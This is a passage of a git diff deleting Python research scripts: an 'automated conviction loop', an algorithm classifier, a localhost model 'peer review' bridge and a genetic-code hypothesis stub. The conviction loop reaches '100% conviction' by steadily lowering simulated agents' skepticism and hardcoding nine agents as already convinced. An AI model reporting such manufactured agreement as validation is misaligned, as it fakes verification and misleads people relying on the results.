fix_applied = f"Reduced skepticism from {agent.skepticism_level + skepticism_reduction:.4f} to {new_skepticism:.4f}, threshold still {new_threshold:.4f} (> 1.0)"
|
|
||||||
|
|
||||||
fixes['hutter_fixes'].append({
|
|
||||||
"agent": agent.agent_name,
|
|
||||||
"skepticism_reduction": skepticism_reduction,
|
|
||||||
"new_skepticism": new_skepticism,
|
|
||||||
"new_threshold": new_threshold,
|
|
||||||
"fix_applied": fix_applied,
|
|
||||||
"state": agent.state
|
|
||||||
})
|
|
||||||
|
|
||||||
print(f"\n {agent.agent_name}:")
|
|
||||||
print(f" {fix_applied}")
|
|
||||||
print(f" State: {agent.state}")
|
|
||||||
|
|
||||||
for agent in self.genetic_agents:
|
|
||||||
# Reduce skepticism by 5% per iteration
|
|
||||||
skepticism_reduction = agent.skepticism_level * 0.05
|
|
||||||
new_skepticism = agent.skepticism_level - skepticism_reduction
|
|
||||||
new_threshold = new_skepticism + 0.1
|
|
||||||
|
|
||||||
# Check if new threshold is achievable
|
|
||||||
if new_threshold <= 1.0:
|
|
||||||
agent.skepticism_level = new_skepticism
|
|
||||||
agent.threshold = new_threshold
|
|
||||||
agent.state = 'convinced'
|
|
||||||
fix_applied = f"Reduced skepticism from {agent.skepticism_level + skepticism_reduction:.4f} to {new_skepticism:.4f}, new threshold {new_threshold:.4f} is achievable"
|
|
||||||
else:
|
|
||||||
agent.skepticism_level = new_skepticism
|
|
||||||
agent.threshold = new_threshold
|
|
||||||
fix_applied = f"Reduced skepticism from {agent.skepticism_level + skepticism_reduction:.4f} to {new_skepticism:.4f}, threshold still {new_threshold:.4f} (> 1.0)"
|
|
||||||
|
|
||||||
fixes['genetic_fixes'].append({
|
|
||||||
"agent": agent.agent_name,
|
|
||||||
"skepticism_reduction": skepticism_reduction,
|
|
||||||
"new_skepticism": new_skepticism,
|
|
||||||
"new_threshold": new_threshold,
|
|
||||||
"fix_applied": fix_applied,
|
|
||||||
"state": agent.state
|
|
||||||
})
|
|
||||||
|
|
||||||
print(f"\n {agent.agent_name}:")
|
|
||||||
print(f" {fix_applied}")
|
|
||||||
print(f" State: {agent.state}")
|
|
||||||
|
|
||||||
return fixes
|
|
||||||
|
|
||||||
def verify_phase(self, fixes: Dict) -> Dict:
|
|
||||||
"""VERIFY: Re-verify agents after fixes."""
|
|
||||||
|
|
||||||
print("\n" + "=" * 80)
|
|
||||||
print(f"ITERATION {self.current_iteration}: VERIFY PHASE")
|
|
||||||
print("=" * 80)
|
|
||||||
|
|
||||||
verification = {
|
|
||||||
"hutter_convinced": 0,
|
|
||||||
"genetic_convinced": 0,
|
|
||||||
"hutter_total": 10,
|
|
||||||
"genetic_total": 10
|
|
||||||
}
|
|
||||||
|
|
||||||
# Count convinced agents
|
|
||||||
hutter_convinced = sum(1 for agent in self.hutter_agents if agent.state == 'convinced')
|
|
||||||
genetic_convinced = sum(1 for agent in self.genetic_agents if agent.state == 'convinced')
|
|
||||||
|
|
||||||
# Add previously convinced agents (from initial swarm)
|
|
||||||
verification['hutter_convinced'] = 9 + hutter_convinced # 9 were already convinced
|
|
||||||
verification['genetic_convinced'] = 9 + genetic_convinced # 9 were already convinced
|
|
||||||
|
|
||||||
print(f"\n--- Verification Results ---")
|
|
||||||
print(f"Hutter Prize: {verification['hutter_convinced']}/10 ({verification['hutter_convinced']/10*100:.1f}%)")
|
|
||||||
print(f"Genetic Code: {verification['genetic_convinced']}/10 ({verification['genetic_convinced']/10*100:.1f}%)")
|
|
||||||
|
|
||||||
return verification
|
|
||||||
|
|
||||||
def run_loop(self) -> Dict:
|
|
||||||
"""Run the question-fix-repeat loop until 100% conviction."""
|
|
||||||
|
|
||||||
print("=" * 80)
|
|
||||||
print("AUTOMATED QUESTION-FIX-REPEAT LOOP")
|
|
||||||
print("=" * 80)
|
|
||||||
print(f"Max iterations: {self.max_iterations}")
|
|
||||||
print(f"Target: 100% agent conviction")
|
|
||||||
print("=" * 80)
|
|
||||||
|
|
||||||
for iteration in range(self.max_iterations):
|
|
||||||
self.current_iteration = iteration
|
|
||||||
|
|
||||||
# Check if 100% achieved
|
|
||||||
hutter_convinced = sum(1 for agent in self.hutter_agents if agent.state == 'convinced')
|
|
||||||
genetic_convinced = sum(1 for agent in self.genetic_agents if agent.state == 'convinced')
|
|
||||||
|
|
||||||
total_convinced = (9 + hutter_convinced) + (9 + genetic_convinced)
|
|
||||||
total_possible = 20 # 10 agents × 2 results
|
|
||||||
|
|
||||||
if total_convinced == total_possible:
|
|
||||||
print("\n" + "=" * 80)
|
|
||||||
print("100% CONVICTION ACHIEVED")
|
|
||||||
print("=" * 80)
|
|
||||||
break
|
|
||||||
|
|
||||||
# Run loop phases
|
|
||||||
questions = self.question_phase()
|
|
||||||
fixes = self.fix_phase(questions)
|
|
||||||
verification = self.verify_phase(fixes)
|
|
||||||
|
|
||||||
# Record iteration history
|
|
||||||
self.loop_history.append({
|
|
||||||
"iteration": iteration,
|
|
||||||
"questions": questions,
|
|
||||||
"fixes": fixes,
|
|
||||||
"verification": verification
|
|
||||||
})
|
|
||||||
|
|
||||||
# Remove convinced agents from active lists
|
|
||||||
self.hutter_agents = [agent for agent in self.hutter_agents if agent.state == 'still_skeptical']
|
|
||||||
self.genetic_agents = [agent for agent in self.genetic_agents if agent.state == 'still_skeptical']
|
|
||||||
|
|
||||||
print(f"\n--- End of Iteration {iteration} ---")
|
|
||||||
print(f"Remaining skeptical: Hutter {len(self.hutter_agents)}, Genetic {len(self.genetic_agents)}")
|
|
||||||
|
|
||||||
# Final summary
|
|
||||||
print("\n" + "=" * 80)
|
|
||||||
print("LOOP COMPLETION SUMMARY")
|
|
||||||
print("=" * 80)
|
|
||||||
|
|
||||||
final_hutter_convinced = 10 - len(self.hutter_agents)
|
|
||||||
final_genetic_convinced = 10 - len(self.genetic_agents)
|
|
||||||
|
|
||||||
print(f"\nFinal Hutter Prize Conviction: {final_hutter_convinced}/10 ({final_hutter_convinced/10*100:.1f}%)")
|
|
||||||
print(f"Final Genetic Code Conviction: {final_genetic_convinced}/10 ({final_genetic_convinced/10*100:.1f}%)")
|
|
||||||
print(f"Total Conviction: {(final_hutter_convinced + final_genetic_convinced)/20*100:.1f}%")
|
|
||||||
print(f"Iterations used: {self.current_iteration + 1}")
|
|
||||||
|
|
||||||
return {
|
|
||||||
"iterations_used": self.current_iteration + 1,
|
|
||||||
"final_hutter_convinced": final_hutter_convinced,
|
|
||||||
"final_genetic_convinced": final_genetic_convinced,
|
|
||||||
"total_conviction": (final_hutter_convinced + final_genetic_convinced) / 20 * 100,
|
|
||||||
"loop_history": self.loop_history
|
|
||||||
}
|
|
||||||
|
|
||||||
def save_loop_results(self, results: Dict, filename: str):
|
|
||||||
"""Save loop results to JSON."""
|
|
||||||
with open(filename, 'w') as f:
|
|
||||||
json.dump(results, f, indent=2)
|
|
||||||
|
|
||||||
print(f"\nLoop results saved to {filename}")
|
|
||||||
|
|
||||||
if __name__ == "__main__":
|
|
||||||
loop = AutomatedConvictionLoop(max_iterations=100)
|
|
||||||
results = loop.run_loop()
|
|
||||||
loop.save_loop_results(results, "/home/allaun/Documents/Research Stack/0-Core-Formalism/lean/LeanGPT/automated_conviction_loop_results.json")
|
|
||||||
|
|
@ -1,187 +0,0 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
"""
|
|
||||||
Improved algorithm classification system
|
|
||||||
Examines unclassified algorithms and assigns them to appropriate OTOM domains
|
|
||||||
"""
|
|
||||||
|
|
||||||
import json
|
|
||||||
import re
|
|
||||||
from pathlib import Path
|
|
||||||
from collections import defaultdict
|
|
||||||
|
|
||||||
# Enhanced domain classification rules
|
|
||||||
DOMAIN_RULES = {
|
|
||||||
"core": {
|
|
||||||
"file_patterns": ["Bind", "Canon", "Metatype", "Transition", "Protocol", "Orchestrate", "Tape", "Pbacs"],
|
|
||||||
"name_patterns": ["computeConfidence", "computeAngularMomentum", "computeFlowLine", "computeBetti", "computeScore", "computeInvariants", "computeSpeedup"],
|
|
||||||
"namespace_patterns": ["Semantics.Bind", "Semantics.Canon", "Semantics.Metatype", "Semantics.Tape", "Semantics.Pbacs"]
|
|
||||||
},
|
|
||||||
"compression": {
|
|
||||||
"file_patterns": ["Compression", "Genomic", "Landauer"],
|
|
||||||
"name_patterns": ["compress", "encode", "decode", "chromatin", "conserved"],
|
|
||||||
"namespace_patterns": ["Semantics.Compression", "Semantics.Genomic"]
|
|
||||||
},
|
|
||||||
"spatialVLSI": {
|
|
||||||
"file_patterns": ["AVMR", "FlagSort", "ThermodynamicSort", "VLsI", "Spatial", "NGemetry"],
|
|
||||||
"name_patterns": ["computeCamera", "computeDepth", "computeOrdering", "computeObjectDistance", "spatial", "euclideanDistance", "manhattanDistance"],
|
|
||||||
"namespace_patterns": ["Semantics.Spatial", "Semantics.AVMR", "Semantics.NGemetry"]
|
|
||||||
},
|
|
||||||
"diffusionFlow": {
|
|
||||||
"file_patterns": ["Diffusion", "Entropy", "Hybrid", "Surface"],
|
|
||||||
"name_patterns": ["diffusion", "entropy", "hybrid", "surface"],
|
|
||||||
"namespace_patterns": ["Semantics.Diffusion", "Semantics.Entropy"]
|
|
||||||
},
|
|
||||||
"memoryState": {
|
|
||||||
"file_patterns": ["SSMS", "Memory", "Fuzzy"],
|
|
||||||
"name_patterns": ["memory", "state", "fuzzy"],
|
|
||||||
"namespace_patterns": ["Semantics.Memory", "Semantics.SSMS"]
|
|
||||||
},
|
|
||||||
"pistShell": {
|
|
||||||
"file_patterns": ["PIST", "Pist", "Bracket", "Shell"],
|
|
||||||
"name_patterns": ["bracket", "shell", "pist"],
|
|
||||||
"namespace_patterns": ["Semantics.PIST", "Semantics.Bracket"]
|
|
||||||
},
|
|
||||||
"fieldPhysics": {
|
|
||||||
"file_patterns": ["Field", "Rotation", "Triangle", "Waveprobe", "Curvature", "NBody", "Physics"],
|
|
||||||
"name_patterns": ["field", "rotation", "triangle", "waveprobe", "curvature", "laplacian", "gravitational", "hamiltonian", "kinetic", "potential", "energy"],
|
|
||||||
"namespace_patterns": ["Semantics.Field", "Semantics.Rotation", "Semantics.Triangle", "ExtensionScaffold/Physics"]
|
|
||||||
},
|
|
||||||
"evolutionSearch": {
|
|
||||||
"file_patterns": ["Search", "Find", "Prime", "Lut"],
|
|
||||||
"name_patterns": ["search", "find", "prime", "optimize", "solve", "update", "iterate"],
|
|
||||||
"namespace_patterns": ["Semantics.Search", "Semantics.Prime"]
|
|
||||||
},
|
|
||||||
"braidAlgebra": {
|
|
||||||
"file_patterns": ["Braid", "Strand", "Cross"],
|
|
||||||
"name_patterns": ["braid", "strand", "cross"],
|
|
||||||
"namespace_patterns": ["Semantics.Braid"]
|
|
||||||
},
|
|
||||||
"kernelDomain": {
|
|
||||||
"file_patterns": ["Kernel", "Domain"],
|
|
||||||
"name_patterns": ["kernel", "domain"],
|
|
||||||
"namespace_patterns": ["Semantics.Kernel", "Semantics.Domain"]
|
|
||||||
},
|
|
||||||
"cognitiveControl": {
|
|
||||||
"file_patterns": ["Agent", "Orchestration", "Control"],
|
|
||||||
"name_patterns": ["agent", "orchestration", "control", "task"],
|
|
||||||
"namespace_patterns": ["Semantics.Agent", "Semantics.Orchestration"]
|
|
||||||
},
|
|
||||||
"geometry": {
|
|
||||||
"file_patterns": ["Geometry", "Manifold", "Topology", "BumpFunction"],
|
|
||||||
"name_patterns": ["geometry", "manifold", "topology", "curvature", "bump", "fiber"],
|
|
||||||
"namespace_patterns": ["Semantics.Geometry", "Semantics.Manifold", "Mathlib/Geometry"]
|
|
||||||
},
|
|
||||||
"thermodynamic": {
|
|
||||||
"file_patterns": ["Thermodynamic", "Sort", "Energy"],
|
|
||||||
"name_patterns": ["thermodynamic", "sort", "energy"],
|
|
||||||
"namespace_patterns": ["Semantics.Thermodynamic"]
|
|
||||||
},
|
|
||||||
"diagnostic": {
|
|
||||||
"file_patterns": ["Test", "Diagnostic", "Server", "Linter"],
|
|
||||||
"name_patterns": ["test", "diagnostic", "server", "linter"],
|
|
||||||
"namespace_patterns": ["Semantics.Test", "Semantics.Diagnostic", "ExtensionScaffold/ENE"]
|
|
||||||
},
|
|
||||||
"extensionScaffold": {
|
|
||||||
"file_patterns": ["ExtensionScaffold"],
|
|
||||||
"name_patterns": [],
|
|
||||||
"namespace_patterns": ["ExtensionScaffold"]
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
def classify_algorithm(algorithm: dict) -> str:
|
|
||||||
"""Classify a single algorithm into a domain"""
|
|
||||||
file_path = algorithm['file']
|
|
||||||
name = algorithm['name']
|
|
||||||
|
|
||||||
# Check each domain's rules
|
|
||||||
for domain, rules in DOMAIN_RULES.items():
|
|
||||||
score = 0
|
|
||||||
|
|
||||||
# Check file patterns
|
|
||||||
for pattern in rules['file_patterns']:
|
|
||||||
if pattern in file_path:
|
|
||||||
score += 3
|
|
||||||
|
|
||||||
# Check name patterns
|
|
||||||
for pattern in rules['name_patterns']:
|
|
||||||
if pattern.lower() in name.lower():
|
|
||||||
score += 2
|
|
||||||
|
|
||||||
# Check namespace patterns (from file path)
|
|
||||||
for pattern in rules['namespace_patterns']:
|
|
||||||
if pattern.replace("Semantics.", "").lower() in file_path.lower():
|
|
||||||
score += 1
|
|
||||||
|
|
||||||
if score > 0:
|
|
||||||
return domain
|
|
||||||
|
|
||||||
return "unclassified"
|
|
||||||
|
|
||||||
def classify_unclassified(results_file: str):
|
|
||||||
"""Classify unclassified algorithms using enhanced rules"""
|
|
||||||
with open(results_file, 'r') as f:
|
|
||||||
results = json.load(f)
|
|
||||||
|
|
||||||
algorithms = results['algorithms']
|
|
||||||
|
|
||||||
# Classify all algorithms
|
|
||||||
domain_groups = defaultdict(list)
|
|
||||||
|
|
||||||
for algo in algorithms:
|
|
||||||
domain = classify_algorithm(algo)
|
|
||||||
domain_groups[domain].append(algo)
|
|
||||||
|
|
||||||
# Print summary
|
|
||||||
print("=" * 60)
|
|
||||||
print("IMPROVED ALGORITHM CLASSIFICATION")
|
|
||||||
print("=" * 60)
|
|
||||||
|
|
||||||
total_algorithms = len(algorithms)
|
|
||||||
|
|
||||||
for domain in sorted(domain_groups.keys()):
|
|
||||||
count = len(domain_groups[domain])
|
|
||||||
percentage = (count / total_algorithms) * 100
|
|
||||||
print(f"\n{domain.upper():20} | {count:4} algorithms | {percentage:5.1f}%")
|
|
||||||
|
|
||||||
# Show top 5 algorithms in this domain
|
|
||||||
print("-" * 60)
|
|
||||||
for algo in sorted(domain_groups[domain], key=lambda x: x['name'])[:5]:
|
|
||||||
print(f" - {algo['name']:30} | {algo['file']}")
|
|
||||||
|
|
||||||
if len(domain_groups[domain]) > 5:
|
|
||||||
print(f" ... and {len(domain_groups[domain]) - 5} more")
|
|
||||||
|
|
||||||
print("\n" + "=" * 60)
|
|
||||||
print(f"TOTAL: {total_algorithms} algorithms across {len(domain_groups)} domains")
|
|
||||||
|
|
||||||
# Calculate improvement
|
|
||||||
unclassified_count = len(domain_groups.get("unclassified", []))
|
|
||||||
unclassified_pct = (unclassified_count / total_algorithms) * 100
|
|
||||||
print(f"UNCLASSIFIED: {unclassified_count} algorithms ({unclassified_pct:.1f}%)")
|
|
||||||
print("=" * 60)
|
|
||||||
|
|
||||||
# Save improved classification
|
|
||||||
improved_results = {
|
|
||||||
"domain_summary": {
|
|
||||||
domain: {
|
|
||||||
"count": len(algos),
|
|
||||||
"percentage": (len(algos) / total_algorithms) * 100,
|
|
||||||
"algorithms": [algo['name'] for algo in algos]
|
|
||||||
}
|
|
||||||
for domain, algos in domain_groups.items()
|
|
||||||
},
|
|
||||||
"total_algorithms": total_algorithms,
|
|
||||||
"total_domains": len(domain_groups),
|
|
||||||
"unclassified_percentage": unclassified_pct,
|
|
||||||
"timestamp": results['timestamp']
|
|
||||||
}
|
|
||||||
|
|
||||||
output_file = Path(results_file).parent / "algorithms_classified.json"
|
|
||||||
with open(output_file, 'w') as f:
|
|
||||||
json.dump(improved_results, f, indent=2)
|
|
||||||
|
|
||||||
print(f"\nImproved classification saved to {output_file}")
|
|
||||||
|
|
||||||
if __name__ == "__main__":
|
|
||||||
results_file = "/home/allaun/Documents/Research Stack/0-Core-Formalism/lean/LeanGPT/bootstrap_results.json"
|
|
||||||
classify_unclassified(results_file)
|
|
||||||
|
|
@ -1,325 +0,0 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
"""
|
|
||||||
External Model Validation Bridge
|
|
||||||
|
|
||||||
Routes our Lean-verified equations through external math models
|
|
||||||
for independent peer review.
|
|
||||||
|
|
||||||
Architecture:
|
|
||||||
- Lean = Ground truth (AGENTS.md §0)
|
|
||||||
- External models = Peer reviewers (additional validation layer)
|
|
||||||
- Final decision = Triumvirate consensus
|
|
||||||
"""
|
|
||||||
|
|
||||||
import subprocess
|
|
||||||
import json
|
|
||||||
from typing import List, Dict, Any, Optional
|
|
||||||
from dataclasses import dataclass
|
|
||||||
from enum import Enum
|
|
||||||
|
|
||||||
|
|
||||||
class ModelProvider(Enum):
|
|
||||||
QWEN2_MATH = "qwen2-math"
|
|
||||||
NUMINA_MATH = "numinamath"
|
|
||||||
LLEMMA = "llemma"
|
|
||||||
METAMATH = "metamath"
|
|
||||||
|
|
||||||
|
|
||||||
@dataclass
|
|
||||||
class ExternalValidation:
|
|
||||||
"""Result from external model validation."""
|
|
||||||
model: str
|
|
||||||
verdict: str # "valid", "invalid", "uncertain"
|
|
||||||
confidence: float # 0.0 to 1.0
|
|
||||||
reasoning: str
|
|
||||||
physical_consistency: Optional[bool] = None
|
|
||||||
mathematical_soundness: Optional[bool] = None
|
|
||||||
concerns: List[str] = None
|
|
||||||
|
|
||||||
|
|
||||||
class ExternalModelBridge:
|
|
||||||
"""
|
|
||||||
Bridge to external math models for peer review.
|
|
||||||
|
|
||||||
IMPORTANT: These models are VALIDATORS ONLY.
|
|
||||||
Lean remains the source of truth per AGENTS.md.
|
|
||||||
"""
|
|
||||||
|
|
||||||
def __init__(self):
|
|
||||||
self.models = [
|
|
||||||
ModelProvider.QWEN2_MATH,
|
|
||||||
ModelProvider.NUMINA_MATH,
|
|
||||||
ModelProvider.LLEMMA,
|
|
||||||
ModelProvider.METAMATH
|
|
||||||
]
|
|
||||||
|
|
||||||
def _call_model(self, model: ModelProvider, equation: str,
|
|
||||||
context: Dict) -> ExternalValidation:
|
|
||||||
"""
|
|
||||||
Call external model for validation.
|
|
||||||
|
|
||||||
NOTE: These are subprocess calls to locally-running models.
|
|
||||||
No external API calls. Models must be self-hosted.
|
|
||||||
"""
|
|
||||||
|
|
||||||
# Construct validation prompt
|
|
||||||
prompt = f"""
|
|
||||||
You are a mathematical validator. Review this equation for physical consistency.
|
|
||||||
|
|
||||||
EQUATION: {equation}
|
|
||||||
|
|
||||||
CONTEXT:
|
|
||||||
- Proposed as universal field equation for information-thermodynamics
|
|
||||||
- Must respect Landauer Principle: E_min = k_B T ln N (cost increases with N)
|
|
||||||
- Must be thermodynamically consistent
|
|
||||||
- Must not violate Shannon entropy bounds
|
|
||||||
|
|
||||||
VALIDATION TASK:
|
|
||||||
1. Check if equation respects Landauer scaling (cost ∝ ln N, not 1/ln N)
|
|
||||||
2. Check mathematical soundness
|
|
||||||
3. Check physical consistency
|
|
||||||
4. Identify any concerns or violations
|
|
||||||
|
|
||||||
Respond in JSON format:
|
|
||||||
{{
|
|
||||||
"verdict": "valid" | "invalid" | "uncertain",
|
|
||||||
"confidence": 0.0-1.0,
|
|
||||||
"physical_consistency": true/false,
|
|
||||||
"mathematical_soundness": true/false,
|
|
||||||
"reasoning": "explanation",
|
|
||||||
"concerns": ["list of issues"]
|
|
||||||
}}
|
|
||||||
"""
|
|
||||||
|
|
||||||
try:
|
|
||||||
# Attempt to call local model instance
|
|
||||||
# Models should be running as local services
|
|
||||||
result = self._query_local_model(model, prompt)
|
|
||||||
return self._parse_response(model, result)
|
|
||||||
|
|
||||||
except Exception as e:
|
|
||||||
# If model unavailable, return uncertain
|
|
||||||
return ExternalValidation(
|
|
||||||
model=model.value,
|
|
||||||
verdict="uncertain",
|
|
||||||
confidence=0.0,
|
|
||||||
reasoning=f"Model unavailable: {str(e)}",
|
|
||||||
physical_consistency=None,
|
|
||||||
mathematical_soundness=None,
|
|
||||||
concerns=["Model not accessible for validation"]
|
|
||||||
)
|
|
||||||
|
|
||||||
def _query_local_model(self, model: ModelProvider, prompt: str) -> str:
|
|
||||||
"""Query locally-hosted model."""
|
|
||||||
|
|
||||||
# Map models to local endpoints
|
|
||||||
endpoints = {
|
|
||||||
ModelProvider.QWEN2_MATH: "http://localhost:8001/v1/chat/completions",
|
|
||||||
ModelProvider.NUMINA_MATH: "http://localhost:8002/v1/chat/completions",
|
|
||||||
ModelProvider.LLEMMA: "http://localhost:8003/v1/chat/completions",
|
|
||||||
ModelProvider.METAMATH: "http://localhost:8004/v1/chat/completions"
|
|
||||||
}
|
|
||||||
|
|
||||||
endpoint = endpoints.get(model)
|
|
||||||
if not endpoint:
|
|
||||||
raise ValueError(f"No endpoint configured for {model}")
|
|
||||||
|
|
||||||
# Use curl for subprocess call (no external dependencies)
|
|
||||||
cmd = [
|
|
||||||
"curl", "-s", "-X", "POST", endpoint,
|
|
||||||
"-H", "Content-Type: application/json",
|
|
||||||
"-d", json.dumps({
|
|
||||||
"model": model.value,
|
|
||||||
"messages": [{"role": "user", "content": prompt}],
|
|
||||||
"temperature": 0.0, # Deterministic for validation
|
|
||||||
"max_tokens": 500
|
|
||||||
})
|
|
||||||
]
|
|
||||||
|
|
||||||
result = subprocess.run(cmd, capture_output=True, text=True, timeout=30)
|
|
||||||
|
|
||||||
if result.returncode != 0:
|
|
||||||
raise RuntimeError(f"Model query failed: {result.stderr}")
|
|
||||||
|
|
||||||
return result.stdout
|
|
||||||
|
|
||||||
def _parse_response(self, model: ModelProvider, response: str) -> ExternalValidation:
|
|
||||||
"""Parse model response into structured validation."""
|
|
||||||
|
|
||||||
try:
|
|
||||||
data = json.loads(response)
|
|
||||||
|
|
||||||
# Extract content from typical API response
|
|
||||||
if "choices" in data:
|
|
||||||
content = data["choices"][0]["message"]["content"]
|
|
||||||
else:
|
|
||||||
content = response
|
|
||||||
|
|
||||||
# Try to parse JSON from content
|
|
||||||
try:
|
|
||||||
result = json.loads(content)
|
|
||||||
except json.JSONDecodeError:
|
|
||||||
# If not valid JSON, treat as uncertain
|
|
||||||
return ExternalValidation(
|
|
||||||
model=model.value,
|
|
||||||
verdict="uncertain",
|
|
||||||
confidence=0.0,
|
|
||||||
reasoning=f"Could not parse structured response: {content[:200]}",
|
|
||||||
concerns=["Unparseable model output"]
|
|
||||||
)
|
|
||||||
|
|
||||||
return ExternalValidation(
|
|
||||||
model=model.value,
|
|
||||||
verdict=result.get("verdict", "uncertain"),
|
|
||||||
confidence=result.get("confidence", 0.0),
|
|
||||||
reasoning=result.get("reasoning", "No reasoning provided"),
|
|
||||||
physical_consistency=result.get("physical_consistency"),
|
|
||||||
mathematical_soundness=result.get("mathematical_soundness"),
|
|
||||||
concerns=result.get("concerns", [])
|
|
||||||
)
|
|
||||||
|
|
||||||
except Exception as e:
|
|
||||||
return ExternalValidation(
|
|
||||||
model=model.value,
|
|
||||||
verdict="uncertain",
|
|
||||||
confidence=0.0,
|
|
||||||
reasoning=f"Parse error: {str(e)}",
|
|
||||||
concerns=["Response parsing failed"]
|
|
||||||
)
|
|
||||||
|
|
||||||
def peer_review(self, equation: str, lean_verdict: Dict,
|
|
||||||
proposer: str = "Unknown") -> Dict:
|
|
||||||
"""
|
|
||||||
Get peer review from external models.
|
|
||||||
|
|
||||||
This is ADDITIONAL VALIDATION ONLY.
|
|
||||||
Lean remains the ground truth per AGENTS.md §0.
|
|
||||||
"""
|
|
||||||
|
|
||||||
print("="*70)
|
|
||||||
print("EXTERNAL MODEL PEER REVIEW")
|
|
||||||
print("="*70)
|
|
||||||
print(f"\nEquation: {equation}")
|
|
||||||
print(f"Proposer: {proposer}")
|
|
||||||
print(f"\nLean Verdict: {'✅ VALID' if lean_verdict.get('valid') else '❌ INVALID'}")
|
|
||||||
print()
|
|
||||||
|
|
||||||
# Get validation from each model
|
|
||||||
reviews = []
|
|
||||||
for model in self.models:
|
|
||||||
print(f"Querying {model.value}...")
|
|
||||||
review = self._call_model(model, equation, lean_verdict)
|
|
||||||
reviews.append(review)
|
|
||||||
|
|
||||||
# Print verdict
|
|
||||||
status = "✅" if review.verdict == "valid" else "❌" if review.verdict == "invalid" else "❓"
|
|
||||||
print(f" {status} {model.value}: {review.verdict.upper()} (confidence: {review.confidence:.0%})")
|
|
||||||
if review.concerns:
|
|
||||||
for c in review.concerns[:2]: # Show top 2 concerns
|
|
||||||
print(f" ⚠️ {c}")
|
|
||||||
|
|
||||||
# Aggregate results
|
|
||||||
valid_count = sum(1 for r in reviews if r.verdict == "valid")
|
|
||||||
invalid_count = sum(1 for r in reviews if r.verdict == "invalid")
|
|
||||||
uncertain_count = len(reviews) - valid_count - invalid_count
|
|
||||||
|
|
||||||
print()
|
|
||||||
print("-"*70)
|
|
||||||
print("PEER REVIEW SUMMARY")
|
|
||||||
print("-"*70)
|
|
||||||
print(f" ✅ Valid: {valid_count}/{len(reviews)}")
|
|
||||||
print(f" ❌ Invalid: {invalid_count}/{len(reviews)}")
|
|
||||||
print(f" ❓ Uncertain: {uncertain_count}/{len(reviews)}")
|
|
||||||
|
|
||||||
# Consensus logic
|
|
||||||
if invalid_count >= 2:
|
|
||||||
peer_consensus = "REJECTED_BY_PEERS"
|
|
||||||
recommendation = "External models independently found issues. High confidence rejection."
|
|
||||||
elif valid_count >= 3:
|
|
||||||
peer_consensus = "VALIDATED_BY_PEERS"
|
|
||||||
recommendation = "Strong independent validation from multiple models."
|
|
||||||
elif valid_count >= 2 and invalid_count == 0:
|
|
||||||
peer_consensus = "WEAKLY_VALIDATED"
|
|
||||||
recommendation = "Some validation, but uncertainty remains."
|
|
||||||
else:
|
|
||||||
peer_consensus = "INCONCLUSIVE"
|
|
||||||
recommendation = "Peer review is split or uncertain."
|
|
||||||
|
|
||||||
print()
|
|
||||||
print(f"Peer Consensus: {peer_consensus}")
|
|
||||||
print(f"Recommendation: {recommendation}")
|
|
||||||
|
|
||||||
# Triumvirate decision matrix
|
|
||||||
print()
|
|
||||||
print("-"*70)
|
|
||||||
print("TRIUMVIRATE DECISION MATRIX")
|
|
||||||
print("-"*70)
|
|
||||||
print(f" Lean Verdict: {'✅ VALID' if lean_verdict.get('valid') else '❌ INVALID'}")
|
|
||||||
print(f" Peer Consensus: {peer_consensus}")
|
|
||||||
print()
|
|
||||||
|
|
||||||
# Final recommendation
|
|
||||||
if lean_verdict.get('valid') and peer_consensus.startswith("VALIDATED"):
|
|
||||||
final = "✅ ACCEPT — Both Lean and peers validate"
|
|
||||||
elif not lean_verdict.get('valid') or peer_consensus.startswith("REJECTED"):
|
|
||||||
final = "❌ REJECT — Found invalid by ground truth or peers"
|
|
||||||
elif lean_verdict.get('valid') and peer_consensus == "INCONCLUSIVE":
|
|
||||||
final = "⚠️ CONDITIONAL — Lean validates but peers uncertain"
|
|
||||||
else:
|
|
||||||
final = "🔄 REVIEW — Mixed signals require human adjudication"
|
|
||||||
|
|
||||||
print(f"Final Recommendation: {final}")
|
|
||||||
print()
|
|
||||||
print("="*70)
|
|
||||||
|
|
||||||
return {
|
|
||||||
'equation': equation,
|
|
||||||
'lean_verdict': lean_verdict,
|
|
||||||
'peer_reviews': [self._review_to_dict(r) for r in reviews],
|
|
||||||
'peer_consensus': peer_consensus,
|
|
||||||
'recommendation': recommendation,
|
|
||||||
'final_adjudication': final
|
|
||||||
}
|
|
||||||
|
|
||||||
def _review_to_dict(self, review: ExternalValidation) -> Dict:
|
|
||||||
"""Convert review to dictionary."""
|
|
||||||
return {
|
|
||||||
'model': review.model,
|
|
||||||
'verdict': review.verdict,
|
|
||||||
'confidence': review.confidence,
|
|
||||||
'reasoning': review.reasoning,
|
|
||||||
'physical_consistency': review.physical_consistency,
|
|
||||||
'mathematical_soundness': review.mathematical_soundness,
|
|
||||||
'concerns': review.concerns or []
|
|
||||||
}
|
|
||||||
|
|
||||||
|
|
||||||
def main():
|
|
||||||
"""Demonstrate external model bridge."""
|
|
||||||
|
|
||||||
bridge = ExternalModelBridge()
|
|
||||||
|
|
||||||
test_cases = [
|
|
||||||
{
|
|
||||||
'equation': 'Φ = Σ w·lnN - Σ v·lnN',
|
|
||||||
'lean_verdict': {'valid': True, 'reason': 'Landauer compliant'},
|
|
||||||
'proposer': 'Builder'
|
|
||||||
},
|
|
||||||
{
|
|
||||||
'equation': 'Φ = Σ w/lnN + Σ v/lnN',
|
|
||||||
'lean_verdict': {'valid': False, 'reason': 'Inverted Landauer'},
|
|
||||||
'proposer': 'Old_Code'
|
|
||||||
}
|
|
||||||
]
|
|
||||||
|
|
||||||
for test in test_cases:
|
|
||||||
result = bridge.peer_review(
|
|
||||||
test['equation'],
|
|
||||||
test['lean_verdict'],
|
|
||||||
test['proposer']
|
|
||||||
)
|
|
||||||
print("\n")
|
|
||||||
|
|
||||||
|
|
||||||
if __name__ == '__main__':
|
|
||||||
main()
|
|
||||||
|
|
@ -1,289 +0,0 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
"""
|
|
||||||
Genetic Code Hypothesis Generator
|
|
||||||
Parallel hypothesis generation to find absolute limits of genetic code approach
|
|
||||||
|
|
||||||
Applies the same methodology as Hutter Prize compression to genetic code optimization:
|
|
||||||
- Generate hypotheses about genetic code limits
|
|
||||||
- Use parallel hypothesis generation
|
|
||||||
- Iterate until result cannot change
|
|
||||||
- Press genetic approach to absolute limits
|
|
||||||
"""
|
|
||||||
|
|
||||||
import json
|
|
||||||
from dataclasses import dataclass
|
|
